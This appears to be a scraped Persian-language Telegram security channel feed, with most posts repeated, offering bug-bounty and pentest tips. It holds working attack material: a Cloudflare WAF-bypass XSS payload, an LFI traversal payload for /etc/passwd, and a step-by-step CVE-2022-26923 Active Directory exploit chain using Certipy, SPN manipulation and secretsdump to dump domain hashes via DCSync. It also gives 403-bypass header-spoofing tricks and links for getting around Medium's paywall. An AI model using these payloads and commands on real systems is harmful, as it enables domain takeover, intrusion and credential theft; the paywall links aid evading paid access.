نمونههایی از مؤلفههای برنامه وب که میتوانید محتویات XSS payload خود را پیادهسازی کنید:
☑️ Login forms
☑️ Contact forms
☑️ Feedback forms
☑️ User profile
☑️ Request information
☑️ Feedback form
☑️ Request headers (and intentional error generation)
)
#tips #bugbounty
@TryHackBox
☑️ Login forms
☑️ Contact forms
☑️ Feedback forms
☑️ User profile
☑️ Request information
☑️ Feedback form
☑️ Request headers (and intentional error generation)
)
#tips #bugbounty
@TryHackBox
bypass XSS Cloudflare WAF
Encoded Payload
Clean Payload
#CF #bypass
@TryHackBox
Encoded Payload
"><track/onerror='confirm\%601\%60'>Clean Payload
"><track/onerror='confirm1'>#CF #bypass
@TryHackBox
💢 شماره پورتهای TCP/UDP و عملکرد و کاربرد هریک
🔸از اون دسته پستهایی که باید ذخیره کنید؛ یه جایی به کارتون میاد
#TCP
#UDP
@TryHackBox
🔸از اون دسته پستهایی که باید ذخیره کنید؛ یه جایی به کارتون میاد
#TCP
#UDP
@TryHackBox
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
🖼 Bypass Medium Paywall
اگر شما هم مثل من با مقالات پولی از Medium برخورد کنید، کمی لایف هک کنید. این سایت ها به شما امکان می دهند مقالات پولی Medium را به صورت رایگان بخوانید:
🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercel.app/
#medium
@TryHackBox
اگر شما هم مثل من با مقالات پولی از Medium برخورد کنید، کمی لایف هک کنید. این سایت ها به شما امکان می دهند مقالات پولی Medium را به صورت رایگان بخوانید:
🔗 https://freedium.cfd/<URL>
🔗 https://medium-forall.vercel.app/
#medium
@TryHackBox
نکات و ترفندهای پاورشل - قسمت اول
https://www.instagram.com/p/C2-R6NIOv_J/?igsh=MzRlODBiNWFlZA==
#powershell
@TryHackBox
https://www.instagram.com/p/C2-R6NIOv_J/?igsh=MzRlODBiNWFlZA==
#powershell
@TryHackBox
Zmap-ProxyScanner
راهی سریع و امن برای یافتن سرورهای پروکسی. 2000-5000 پروکسی http, socks4, socks5 کارآمد را در یک اسکن پیدا کنید.
Config
https://github.com/Yariya/Zmap-ProxyScanner
#zamp
@TryHackBox
@TryHackBoxOfficial
@LibrarySecOfficial
راهی سریع و امن برای یافتن سرورهای پروکسی. 2000-5000 پروکسی http, socks4, socks5 کارآمد را در یک اسکن پیدا کنید.
Config
{
"check-site": "https://google.com",
"proxy-type": "http",
"http_threads": 2000,
"headers": {
"user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.115 Safari/537.36",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8"
},
"print_ips": {
"enabled": true,
"display-ip-info": true
},
"timeout": {
"http_timeout": 5,
"socks4_timeout": 5,
"socks5_timeout": 5
}
}https://github.com/Yariya/Zmap-ProxyScanner
#zamp
@TryHackBox
@TryHackBoxOfficial
@LibrarySecOfficial
👍3
🗄Microsoft SQL DBMS
اغلب میتوان در طول پنتست زیرساختهای داخلی ویندوز یافت، بنابراین مهم است که یک زنجیره ابزار با کیفیت بالا در دسترس داشته باشید. دو ابزار را بگیرید که به شما امکان می دهد حملات زیر را انجام دهید.
1. Enumeration Techniques
2. Authentication Providers
3. Using Standard Modules
4. Using Linked Modules
5. Using Impersonation Modules
6. Using SCCM Modules
7. Contributing and Extending SQLRecon
8. Hardening your SQL Server Environment
SQLRecon
PySQLRecon
#tools #pentest #redteam
@TryHackBox
اغلب میتوان در طول پنتست زیرساختهای داخلی ویندوز یافت، بنابراین مهم است که یک زنجیره ابزار با کیفیت بالا در دسترس داشته باشید. دو ابزار را بگیرید که به شما امکان می دهد حملات زیر را انجام دهید.
1. Enumeration Techniques
2. Authentication Providers
3. Using Standard Modules
4. Using Linked Modules
5. Using Impersonation Modules
6. Using SCCM Modules
7. Contributing and Extending SQLRecon
8. Hardening your SQL Server Environment
SQLRecon
PySQLRecon
#tools #pentest #redteam
@TryHackBox
🔥2
چندین روش برای بایپس 403 Forbidden HTTP response توضیح دهید .
🔸 اگر سرور از روشهای مختلف HTTP (مثلا POST به جای GET) استفاده کنید یا پارامترهای هدر/URL را لغو کنید (مثلاً X-HTTP-Method)
🔸 استفاده از هدرهای HTTP Origin Client (به عنوان مثال X-Forwarded-For) برای جعل آدرس IP مبدا و دور زدن لیست سیاه IP
🔸 مسیر URL را با استفاده از پیمایش دایرکتوری، تغییر حروف کوچک، اضافه کردن کاراکترها، رمزگذاری URL و موارد دیگر کنترل کنید
#questions_from_social
@TryHackBox
@TryHackBoxOfficial > RoadMap
@LibrarySecOfficial > Book
🔸 اگر سرور از روشهای مختلف HTTP (مثلا POST به جای GET) استفاده کنید یا پارامترهای هدر/URL را لغو کنید (مثلاً X-HTTP-Method)
🔸 استفاده از هدرهای HTTP Origin Client (به عنوان مثال X-Forwarded-For) برای جعل آدرس IP مبدا و دور زدن لیست سیاه IP
🔸 مسیر URL را با استفاده از پیمایش دایرکتوری، تغییر حروف کوچک، اضافه کردن کاراکترها، رمزگذاری URL و موارد دیگر کنترل کنید
#questions_from_social
@TryHackBox
@TryHackBoxOfficial > RoadMap
@LibrarySecOfficial > Book
👍4
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
اجازه دهید به طور خلاصه در مورد یک آسیب پذیری جالب صحبت کنیم که به ما امکان می دهد دسترسی ها را در یک دامنه افزایش دهیم.
الزامات:
1. حساب دامنه.
2. امکان افزودن کامپیوتر به دامنه.
3. در دسترس بودن یک الگوی استاندارد گواهی ماشین.
4. امکان تغییر ویژگی های یک حساب کامپیوتر (به طور پیش فرض پس از افزودن کامپیوتر به دامنه خواهد بود، زیرا ما مالک شی خواهیم بود).
🐍 برای عملیات ما از ابزار Certipy استفاده می کنیم؛ اطلاعات مختصری در مورد آن در زیر ارائه شده است:
بعد، به هر میزبان دامنه بروید و شروع به تغییر SPN ورودی رایانه خود کنید:
ما به میزبان مهاجم برمی گردیم و یک گواهی جدید درخواست می کنیم:
ما با گواهی دریافت شده وارد می شویم و هش NTLM حساب کنترل کننده دامنه را دریافت می کنیم:
در مرحله بعد، ما یک حمله DCSync را به هر شکلی که برای ما مناسب باشد انجام می دهیم و دامنه را تصرف می کنیم:
این وکتور فقط در یک محیط اکتیو دایرکتوری آسیب پذیر به CVE-2022-26923 کار می کند، اما اگر خود را در یکی بیابید، افزایش دسترسی ها به آسانی، به عنوان مثال، در مورد سوء استفاده از ZeroLogon خواهد بود!🔺
#AD
@TryHackBox
اجازه دهید به طور خلاصه در مورد یک آسیب پذیری جالب صحبت کنیم که به ما امکان می دهد دسترسی ها را در یک دامنه افزایش دهیم.
الزامات:
1. حساب دامنه.
2. امکان افزودن کامپیوتر به دامنه.
3. در دسترس بودن یک الگوی استاندارد گواهی ماشین.
4. امکان تغییر ویژگی های یک حساب کامپیوتر (به طور پیش فرض پس از افزودن کامپیوتر به دامنه خواهد بود، زیرا ما مالک شی خواهیم بود).
🐍 برای عملیات ما از ابزار Certipy استفاده می کنیم؛ اطلاعات مختصری در مورد آن در زیر ارائه شده است:
# نصب و راه اندازیبیایید حمله را با افزودن یک کامپیوتر به دامنه با استفاده از Impacket-Addcomputer شروع کنیم
pip install certipy-ad
# درخواست گواهی
# برای certipy-ad نسخه 3.0.0:
گواهی
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# برای certipy-ad نسخه 4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10
# مجوز با گواهی برای بازیابی هش NTLM:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'ما یک گواهی برای حساب کامپیوتر (الگوی ماشین) درخواست می کنیم و با آن وارد می شویم:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfx
بعد، به هر میزبان دامنه بروید و شروع به تغییر SPN ورودی رایانه خود کنید:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # به دلیل یک SPN تکراری خطایی را برمیگرداند
Set-ADComputer TESTPC -ServicePrincipalName @{} # reset SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local
ما به میزبان مهاجم برمی گردیم و یک گواهی جدید درخواست می کنیم:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
ما با گواهی دریافت شده وارد می شویم و هش NTLM حساب کنترل کننده دامنه را دریافت می کنیم:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733
در مرحله بعد، ما یک حمله DCSync را به هر شکلی که برای ما مناسب باشد انجام می دهیم و دامنه را تصرف می کنیم:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt
این وکتور فقط در یک محیط اکتیو دایرکتوری آسیب پذیر به CVE-2022-26923 کار می کند، اما اگر خود را در یکی بیابید، افزایش دسترسی ها به آسانی، به عنوان مثال، در مورد سوء استفاده از ZeroLogon خواهد بود!🔺
#AD
@TryHackBox
❤1👍1🔥1
🤔 آیا همیشه از آزمایش سایت های استاتیک صرف نظر می کنید؟ چندین دلیل برای عدم انجام این کار وجود دارد:
1️⃣ فایل های پشتیبان را باز کنید: فقط یک فرهنگ لغت با پسوندهایی مانند .bak/.zip بگیرید و با Burp، ffuf یا ابزارهای دیگر اسکن کنید. برای جستجوی نسخه های پشتیبان نیز از موارد زیر استفاده کنید:
2️⃣ پورتال/پنل هایی را باز کنید که از طریق آنها می توانید دسترسی ها را افزایش دهید
3️⃣ نسخه های سرور آسیب پذیر
#tips #bugbounty
@TryHackBox
@TryHackBoxOfficial
1️⃣ فایل های پشتیبان را باز کنید: فقط یک فرهنگ لغت با پسوندهایی مانند .bak/.zip بگیرید و با Burp، ffuf یا ابزارهای دیگر اسکن کنید. برای جستجوی نسخه های پشتیبان نیز از موارد زیر استفاده کنید:
🔸Google-Docs
🔸Wayback Machine
🔸Robots.txt
🔸Directory listings
2️⃣ پورتال/پنل هایی را باز کنید که از طریق آنها می توانید دسترسی ها را افزایش دهید
3️⃣ نسخه های سرور آسیب پذیر
#tips #bugbounty
@TryHackBox
@TryHackBoxOfficial
👩💻 Honeypot:
مجموعه ای از بانک های اطلاعاتی هانی پات
این پایگاههای داده واقعاً آسیبپذیر هستند که معمولاً حملاتی مانند تزریق SQL را جذب میکنند .
- طراحی شده تا مهاجمان را فریب دهد تا فکر کنند ممکن است حاوی اطلاعات محرمانه مانند جزئیات کارت بانکی باشند.
1. pg-server
- شبیه ساز سرور پایگاه داده Postgres، پروکسی و فریب.
2. dns.py
- اسکریپتی برای ایجاد یک هانیپات DNS که همه درخواستها را در پایگاه داده SQLite ثبت میکند و سطح تعاملی قابل تنظیمی دارد.
3. RedisHoneyPot
یک هانی پات بسیار تعاملی برای پروتکل Redis است. می تواند اجرای دستورات ping, info, set, get, del, exists, keys, flushall, flushdb, save, select, dbsize, config, slaveof را شبیه سازی کند.
4. mysql-honeypotd
- هانی پات MySQL با تعامل کم که به زبان C نوشته شده است.
5. MongoDB-HoneyProxy
یک پراکسی honeypot برای mongod است که ترافیک را به یک سرور ساختگی ثبت می کند.
#Honeypot
@TryHackBox
@TryHackBoxOfficial
مجموعه ای از بانک های اطلاعاتی هانی پات
این پایگاههای داده واقعاً آسیبپذیر هستند که معمولاً حملاتی مانند تزریق SQL را جذب میکنند .
- طراحی شده تا مهاجمان را فریب دهد تا فکر کنند ممکن است حاوی اطلاعات محرمانه مانند جزئیات کارت بانکی باشند.
1. pg-server
- شبیه ساز سرور پایگاه داده Postgres، پروکسی و فریب.
2. dns.py
- اسکریپتی برای ایجاد یک هانیپات DNS که همه درخواستها را در پایگاه داده SQLite ثبت میکند و سطح تعاملی قابل تنظیمی دارد.
3. RedisHoneyPot
یک هانی پات بسیار تعاملی برای پروتکل Redis است. می تواند اجرای دستورات ping, info, set, get, del, exists, keys, flushall, flushdb, save, select, dbsize, config, slaveof را شبیه سازی کند.
4. mysql-honeypotd
- هانی پات MySQL با تعامل کم که به زبان C نوشته شده است.
5. MongoDB-HoneyProxy
یک پراکسی honeypot برای mongod است که ترافیک را به یک سرور ساختگی ثبت می کند.
#Honeypot
@TryHackBox
@TryHackBoxOfficial
👍3
LFI
*
Payload:
#LFI
@TryHackBox
@TryHackBoxOfficial
*
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"#LFI
@TryHackBox
@TryHackBoxOfficial
👍3👎2
🔎 نقشه ذهنی Shodan.
• اگر گوگل سایت های خبری و دایره المعارف هایی را که به طور خاص در معرض دید عموم قرار دارند ایندکس می کند، آنگاه Shodan یک موتور جستجو است که به طور خاص تمام دستگاه های محاسباتی متصل به اینترنت (دوربین های وب، روترها، سرورها، دستگاه های اینترنت اشیا و غیره) را فهرست می کند و به شما این امکان را می دهد که آنها را با استفاده از پرس و جوها و فیلترهای مختلف جستجو پیدا کنید.
• برای استفاده از Shodan، پیشنهاد می کنم با Mindmap مفید آشنا شوید که به شما در درک فیلترها، کوئری ها و آموزش کار با این ابزار کمک می کند.
➡️ Mindmap
را با فرمت مناسب دانلود کنید:
https://github.com/Ignitechnologies/Mindmap/tree/main/Shodan
#Shodan
@TryHackBox
@TryHackBoxOfficial
• اگر گوگل سایت های خبری و دایره المعارف هایی را که به طور خاص در معرض دید عموم قرار دارند ایندکس می کند، آنگاه Shodan یک موتور جستجو است که به طور خاص تمام دستگاه های محاسباتی متصل به اینترنت (دوربین های وب، روترها، سرورها، دستگاه های اینترنت اشیا و غیره) را فهرست می کند و به شما این امکان را می دهد که آنها را با استفاده از پرس و جوها و فیلترهای مختلف جستجو پیدا کنید.
• برای استفاده از Shodan، پیشنهاد می کنم با Mindmap مفید آشنا شوید که به شما در درک فیلترها، کوئری ها و آموزش کار با این ابزار کمک می کند.
➡️ Mindmap
را با فرمت مناسب دانلود کنید:
https://github.com/Ignitechnologies/Mindmap/tree/main/Shodan
#Shodan
@TryHackBox
@TryHackBoxOfficial
👍6